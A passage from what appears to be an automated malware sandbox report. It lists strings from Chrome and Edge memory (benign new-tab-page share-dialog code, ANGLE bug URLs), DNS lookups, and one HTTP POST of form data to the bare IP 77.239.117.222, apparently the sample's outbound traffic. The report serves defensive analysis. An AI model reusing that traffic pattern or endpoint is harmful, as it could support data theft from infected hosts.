url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                  Source: chrome.exe, 00000007.00000003.1973895323.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973978198.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973831800.00005AF00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: apis.google.com
                  Source: global trafficDNS traffic detected: DNS query: play.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: c.msn.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: api.msn.com
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----pzctjec2n7y58ycjw47qHost: 77.239.117.222Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
